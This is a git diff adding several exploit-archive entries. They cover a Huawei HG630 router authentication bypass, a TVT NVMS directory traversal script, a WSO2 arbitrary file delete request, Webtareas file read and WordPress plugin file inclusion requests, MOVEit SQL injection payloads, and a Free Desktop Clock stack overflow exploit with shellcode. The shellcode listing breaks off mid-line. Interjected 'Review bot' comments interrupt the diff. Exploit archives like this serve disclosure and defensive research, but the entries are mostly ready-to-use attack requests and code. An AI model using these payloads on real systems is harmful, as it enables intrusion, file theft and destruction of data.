diff --git a/exploits/hardware/webapps/48310.txt b/exploits/hardware/webapps/48310.txt
new file mode 100644
index 000000000..61e7d2b48
--- /dev/null
+++ b/exploits/hardware/webapps/48310.txt
@@ -0,0 +1,51 @@
+# Title: Huawei HG630 2 Router - Authentication Bypass
+# Date: 2020-04-13
+# Author: Eslam Medhat
+# Vendor Homepage: www.huawei.com
+# Version: HG630 V2
+# HardwareVersion: VER.B
+# CVE: N/A
+
+#POC:
+
+The default password of this router is the last 8 characters of the
+device's serial number which exist in the back of the device.
+
+An attacker can leak the serial number via the web app API like the
+following:
+
+************************Request************************
+GET /api/system/deviceinfo HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
+Gecko/20100101 Firefox/65.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://192.168.1.1/
+X-Requested-With: XMLHttpRequest
+Connection: close
+Cookie:
+SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm
+
+
+************************Response************************
+HTTP/1.1 200 OK
+Cache-Control: no-cache, no-store, max-age=0, must-revalidate
+X-Download-Options: noopen
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+Date: Fri, 01 Jan 2010 09:14:47 GMT
+Connection: Keep-Alive
+Content-Language: en
+Content-Type: application/javascript
+Content-Length: 141
+
+while(1); /*{"DeviceName":"HG630
+V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/
+
+
+You can use that serial number to login to the router.
+
+#Reference:
+https://www.youtube.com/watch?v=vOrIL7L_cVc
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48311.py b/exploits/hardware/webapps/48311.py
new file mode 100755
index 000000000..18243acd7
--- /dev/null
+++ b/exploits/hardware/webapps/48311.py
@@ -0,0 +1,43 @@
+# Exploit Title: TVT NVMS 1000 - Directory Traversal
+# Date: 2020-04-13
+# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
+# Vendor Homepage: http://en.tvt.net.cn/
+# Version : N/A
+# Software Link : http://en.tvt.net.cn/products/188.html
+# Original Author : Numan Türle
+# CVE : CVE-2019-20085
+
+import sys
+import requests
+import os
+import time
+
+if len(sys.argv) !=4:
+ print " "
+ print "Usage : python exploit.py url filename outputname"
+ print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
+ print " "
+else:
+
+
+ traversal = "../../../../../../../../../../../../../"
+ filename = sys.argv[2]
+ url = sys.argv[1]+traversal+filename
+ outputname = sys.argv[3]
+ content = requests.get(url)
+
+ if content.status_code == 200:
+
+ print " "
+ print "Directory Traversal Succeeded"
+ time.sleep(3)
+ print " "
+ print "Saving Output"
+ os.system("touch " + outputname)
+ output_write = open(outputname,"r+")
+ output_write.write(content.text)
+ output_write.close()
+
+ else:
+
+ print "Host not vulnerable to Directory Traversal!"
\ No newline at end of file
diff --git a/exploits/java/webapps/48313.txt b/exploits/java/webapps/48313.txt
new file mode 100644
index 000000000..7ab57c008
--- /dev/null
+++ b/exploits/java/webapps/48313.txt
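Review bot: `os.system("touch " + outputname)` hands an unvalidated argv value to a shell, and it only exists because the next line opens the file with `"r+"`, which requires it to exist already; opening for writing creates it, so the three lines collapse into `with open(outputname, "w") as output_write:` / `output_write.write(content.text)`, which also guarantees the handle is closed on error. `requests.get(url)` is called without `timeout=`, so an unresponsive host hangs the script indefinitely; `requests.get(url, timeout=10)` is the usual guard. The `time.sleep(3)` before saving serves no purpose and can be dropped, and the `print` statements make this Python-2-only, which the header should state.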
@@ -0,0 +1,146 @@ +# Title: WSO2 3.1.0 - Arbitrary File Delete +# Date: 2020-04-12 +# Author: raki ben hamouda +# Vendor: https://apim.docs.wso2.com +# Softwrare link: https://apim.docs.wso2.com/en/latest/ +# CVE: N/A + + +Document Title: +=============== +WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal ) + + +##CVE not assigned yet + +##Security Update : https://apim.docs.wso2.com/en/latest/ + + +Common Vulnerability Scoring System: +==================================== +8.5 + + +Affected Product(s): +==================== +WSO2 API Manager Carbon Interface + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product . +The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests +and to delete arbitrary System files. + +The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter +of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files +via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" . + +The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. +Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction. +Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality. + +=============================== + +Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...) 
+ +[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension. +org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d +eployment\server\registryextensions\commons-dir + at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j +ava:531) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.handleResponse( +OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO +peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out +InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.client.OperationClient.execute(OperationClient.java: +149) ~[axis2_1.6.1.wso2v38.jar:?] + at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem +oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte +nsions.stub_4.7.13.jar:?] + at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient. +deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens +ions.ui_4.7.13.jar:?] + at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS +ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?] + at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t +omcat_9.0.22.wso2v1.jar:?] + +*Error displayed in Web browser with body request: + + + + + +============================= + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp + +Vulnerable Parameter(s): +[+] extensionName + + +Server version + 3.0.0 + + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. 
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +1-Attacker must have access to the Extension component(List ,Add ,Delete extensions ) +2-attacker uploads any file .jar extension +3-attacker intercepts the request that follows and modifies the parameter with traversal string: + +--- PoC Session Logs [POST] --- + +POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1 +Host: localhost:9443 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest, XMLHttpRequest +X-Prototype-Version: 1.5.0 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS +Content-Length: 22 +Origin: https://localhost:9443 +Connection: close +Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu +Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions +Pragma: no-cache +Cache-Control: no-cache + +extensionName=../../../../INSTALL.txt + + ---------------Returned Headers in Response------------------ + +HTTP/1.1 200 
+X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: DENY +Content-Type: text/html;charset=UTF-8 +Content-Length: 10 +Date: Sat, 04 Jan 2020 00:55:38 GMT +Connection: close +Server: WSO2 Carbon Server \ No newline at end of file diff --git a/exploits/php/webapps/48312.txt b/exploits/php/webapps/48312.txt new file mode 100644 index 000000000..c4a02318e --- /dev/null +++ b/exploits/php/webapps/48312.txt @@ -0,0 +1,26 @@ +# Exploit Title: Webtateas 2.0 - Arbitrary File Read +# Date: 2020-04-12 +# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. +# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php +# Software Link: http://webtareas.sourceforge.net/general/home.php +# Version: Webtateas v2.0 +# Tested on: Windows +# CVE : N/A + +Vulnerable Request: +POST /webtareas/includes/general_serv.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 72 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/webtareas/general/home.php? +Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver +DNT: 1 + +action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini \ No newline at end of file diff --git a/exploits/php/webapps/48315.txt b/exploits/php/webapps/48315.txt new file mode 100644 index 000000000..cd87d86a0 --- /dev/null +++ b/exploits/php/webapps/48315.txt 
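Review bot: The version in the title, `WSO2 3.1.0`, does not match the body, which lists `Server version 3.0.0` under the vulnerable-module section, and the index entry copies the title, so the header should state the version that was actually tested. The `Security Update` line points at the general product documentation rather than a vendor advisory or fix; it should cite the actual advisory or say that no fix was available at time of writing. The `Document Title` line spells the product `WOS2` and the header reads `Softwrare link`. This file's hunk spans several physical lines here; these points concern its header portion.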
@@ -0,0 +1,28 @@ +# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion +# Google Dork: N/A +# Date: 2020-04-13 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: http://davidlingren.com/ +# Software Link: https://wordpress.org/plugins/media-library-assistant/ +# Version: 2.81 +# Tested on: Windows 7 x86 SP1 +# CVE : CVE-2020-11731, CVE-2020-11732 + +----Local File Inclusion---------------------------- + +There is a file inclusion vulnerability in the mla-file-downloader.php file. Example: + +http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php + +Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication. + + +----Multiple Cross-Site-Scripting------------------- + +There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. + +Note that this vulnerability requires authentication. + + + +Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2 \ No newline at end of file diff --git a/exploits/php/webapps/48316.txt b/exploits/php/webapps/48316.txt new file mode 100644 index 000000000..7d16a13e7 --- /dev/null +++ b/exploits/php/webapps/48316.txt 
@@ -0,0 +1,34 @@ +# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection +# Google Dork: inurl:human.aspx intext:moveit +# Date: 2020-04-12 +# Exploit Authors: Aviv Beniash, Noam Moshe +# Vendor Homepage: https://www.ipswitch.com/ +# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1 +# CVE : CVE-2019-16383 +# +# Related Resources: +# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability +# https://nvd.nist.gov/vuln/detail/CVE-2019-16383 + +# Description: +# The API call for revoking logon tokens is vulnerable to a +# Time based blind SQL injection via the 'token' parameter + +# MSSQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 + +token='; WAITFOR DELAY '0:0:10'-- + + +# MySQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 21 + +token=' OR SLEEP(10); \ No newline at end of file diff --git a/exploits/windows/local/48314.py b/exploits/windows/local/48314.py new file mode 100755 index 000000000..9a6660afb --- /dev/null +++ b/exploits/windows/local/48314.py 
@@ -0,0 +1,324 @@ +# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) +# Exploit Author: Bobby Cooke +# Date: 2020-04-11 +# Vendor: Drive Software Company +# Vendor Site: http://www.drive-software.com +# Software Download: http://www.drive-software.com/download/freeclock.exe +# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86) +# - Does not work on x64 version +# Version: Free Desktop Clock 3.0 +# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer + +############################### CRASH INFO ############################### +# [!] Access violation +# 042D15E7 8908 mov [eax], ecx ; FreeDesk.00440044 +# SEH chain of main thread +# Address SE handler +# 0014EE24 FreeDesk.00410041 <- Structured Exception Handler Overwrite +# 00410041 74737953 +# 69620C00 *** CORRUPT ENTRY *** +############################### CRASH INFO ############################### + +File = 'poc.txt' + +######################### EXPLOIT ENVIRONMENT INFO ######################### +#badChars = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e' +#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f' +#goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f) + +# Base | Rebase | SafeSEH | ASLR | NXCompat | Modulename +# 0x00400000 | False | False | False | False | [FreeDesktopClock.exe] +# 0x042b0000 | True | False | False | False | [Clock.dll] +######################### EXPLOIT ENVIRONMENT INFO ######################### + +os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite +nSEH = '\xeb\x05' # jmp short +2 +SEH = '\xeb\x43' # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe] +# nSEH & SEH translated opcodes after Pop-Pop-Ret +# EB 00 jmp short +2 +# 05 00EB0043 add eax, 4300EB00 + +# GetPC to decode our decoder using Venetian Blinds technique +getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory +getPC += '\x61' # popad # [ESP] = &Payload +getPC += '\x72' # add [edx], dh # 
realigns execution for 1 byte opcodes + +ebx2eax = '\x58' # pop eax # EAX = &Payload +ebx2eax += '\x72' # add [edx], dh + +# Use Venetian Blinds technique to fix our mangled decoder +# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte. +# +# Ajust EAX to &Decoder +getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x50' # push eax # [ESP] = &Decoder +getDecoder += '\x72' # add [edx], dh + +############################# ZIPPER DECODER ############################### +# Set EAX = First non-null byte of shellcode +# init: +# 1 | 50 | push eax # EAX = &Shellcode +# 2 | 5F | pop edi # EDI = Decoder Destination Base Address +# 3 | 47 | inc edi # First 0x00 byte of shellcode +# 4:5 | 33D2 | xor edx, edx +# 6:7 | 33C9 | xor ecx, ecx +# 8:11 | 66:B9 1004 | mov cx, 410 # ECX = Loop Counter +# decodeLoop: +# 12:13 | 33DB | xor ebx, ebx +# 14 | 42 | inc edx # EDX+EAX = &SourceShellcodeByte +# 15 | 42 | inc edx # increment to next non-null byte +# 16:17 | 32DB | xor bl, bl # clear BL to hold next shellcode byte +# 18:20 | 021C10 | add bl, [eax+edx] # BL = SourceShellcodeByte +# 21:22 | 203F | and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00 +# 23:24 | 301F | xor [edi], bl # Write next byte of shellcode +# 25 | 47 | inc edi +# 26 | 49 | dec ecx +# 27:28 | 74 02 | je short jmp2code +# 29:30 | ^ EB ED | jmp short decodeLoop +# jmp2code: +# 31 | 50 | push eax +# 32 | C3 | ret +################################################3########################### + +#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' +firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' +#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3' +# 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 + +# Note: These nop unicode 
instructions are actually [reg+0x00] not [reg] +# The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes +# Use the 3 byte version for Venetian Blinds alignment + # Example: + # nasm > add [edx], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+00], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+01], dh + # 00000000 007201 add [edx+0x1],dh + # + This happens when typing in ASM commands into msf-nasm_shell and immunity + +## 2nd byte - \x00 => \x5F +venBlinds = '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\xC6\x5F' # mov byte [eax], 0x50 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 4th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 6th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 8th byte - \x00 => \x66 +venBlinds += '\xC6\x66' # mov byte [eax], 0x66 +venBlinds += '\x72' # add [edx], dh // nop to realign 
opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 10th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 12th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 14th byte - \x00 => \x42 +venBlinds += '\xC6\x42' # mov byte [eax], 0x42 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 16th byte - \x00 => \x32 +venBlinds += '\xC6\x32' # mov byte [eax], 0x32 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 
18th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 20th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 22nd byte - \x00 => \x3F +venBlinds += '\xC6\x3F' # mov byte [eax], 0x3F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 24nd byte - \x00 => \x1F +venBlinds += '\xC6\x1F' # mov byte [eax], 0x1F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 26th byte - \x00 => \x49 +venBlinds += '\xC6\x49' # mov byte [eax], 0x49 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += 
'\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 28th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 30th byte - \x00 => \xED +venBlinds += '\xC6\xED' # mov byte [eax], 0xED +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 32nd byte - \x00 => \xC3 +venBlinds += '\xC6\xC3' # mov byte [eax], 0xC3 +venBlinds += '\x72' # add [edx], dh +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh +# Jump to the decoded decoder by Returning to the address we saved on the stack +venBlinds += '\xC3' # ret [!] Now we are executing the decoder! 
+ +os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds)) + +#badChars = 00 0d 80 82->8e 91->9f +# Custom PopCalc shellcode that avoids the bad characters +fKernel32 = '\x33\xF6' # xor esi, esi +fKernel32 += '\xF7\xE6' # mul esi +fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30] # EBX = Address_of_PEB +fKernel32 += '\x03\x42\x0C' # add eax, [edx+C] # EBX = Address_of_LDR +fKernel32 += '\x03\x70\x1C' # add esi, [eax+1C] # ESI = 1st entry in InitOrderModuleList / ntdll.dll +fKernel32 += '\xAD' # lodsd # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll +fKernel32 += '\x50' # push eax +fKernel32 += '\x5E' # pop esi +fKernel32 += '\xAD' # lodsd # EAX = 3rd entry in InitOrderModuleList / kernel32.dll +fKernel32 += '\xFF\x70\x08' # push dword ptr [eax+8] # [ESP] = &kernel32 + +gExpotTbl = '\x33\xC9' # xor ecx, ecx +gExpotTbl += '\x33\xF6' # xor esi, esi +gExpotTbl += '\x33\xDB' # xor ebx, ebx +gExpotTbl += '\xF7\xE3' # mul ebx +gExpotTbl += '\x58' # pop eax # EAX = &kernel32 +gExpotTbl += '\x50' # push eax # [ESP] = &kernel32 +gExpotTbl += '\x03\x70\x3C' # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader +gExpotTbl += '\x03\xF0' # add esi, eax ; ESI = &NewEXEHeader +gExpotTbl += '\x03\x56\x78' # add edx, [esi+0x78] ; EDX = RVA ExportTable +gExpotTbl += '\x03\xD0' # add edx, eax ; EDX = &ExportTable = 763477B0 + +gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable +gExpotTbl += '\x03\xD8' # add ebx, eax ; EBX = &ExportNameTable + +gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable +gExpotTbl += '\x03\xC8' # add ecx, eax ; ECX = &ExportOrdinalTable +gExpotTbl += '\x51' # push ecx + +gExpotTbl += '\x33\xFF' # xor edi, edi +gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable +gExpotTbl += '\x03\xF8' # add edi, eax ; EDI = &ExportAddrTable +gExpotTbl += '\x57' # push edi + +fWinExec = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW +fWinExec += '\x33\xC0' # xor 
eax, eax ; EAX = Counter + +fWinExec += '\x33\xF6' # xor esi, esi +fWinExec += '\x03\xF4' # add esi, esp ; ESI = "WinE" +fWinExec += '\xFC' # cld ; Process strings left to right +fWinExec += '\x50' # push eax +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xFF' # xor edi, edi +fWinExec += '\x03\x3C\x18' # add edi, [eax+ebx] +fWinExec += '\x58' # pop eax +fWinExec += '\x03\x7C\x24\x0C' # add edi, [esp+0xC] ; EDI = &NthNameString +fWinExec += '\xF3\xA6' # repe cmpsb ; compare [&NthNameString] to "WinExec" +fWinExec += '\x74\x03' # jz found ; If [&NthNameString] == "WinExec" end loop +fWinExec += '\x40' # inc eax ; Counter ++ +fWinExec += '\xEB\xE1' # jmp short searchLoop ; restart loop + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable +fWinExec += '\x03\xC8' # add ecx, eax +fWinExec += '\x33\xC0' # xor eax, eax +fWinExec += '\x66\x03\x01' # add ax, [ecx] ; AX = ordinalNumber + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41\x41\x41\x41' # inc ecx X 4 +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\xFF\x74\x24\x04' # push dword [esp+0x4] +fWinExec += '\x01\x04\x24' # add [esp], eax +fWinExec += '\x5A' # pop edx +fWinExec += '\x33\xDB' # xor ebx, ebx +fWinExec += '\x03\x1A' # add ebx, [edx] ; EBX = RVA WinExec +fWinExec += '\x03\x5C\x24\x0C' # add ebx, [esp+0xC] ; EBX = &WinExec +# Call WinExec( CmdLine, ShowState ); +# CmdLine = "calc.exe" +# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window +callWinExec = '\x33\xC9' # xor ecx, ecx ; clear eax register +callWinExec += '\x51' # push ecx ; string terminator 0x00 for "calc.exe" string +callWinExec += '\x68\x2E\x65\x78\x65' # push 
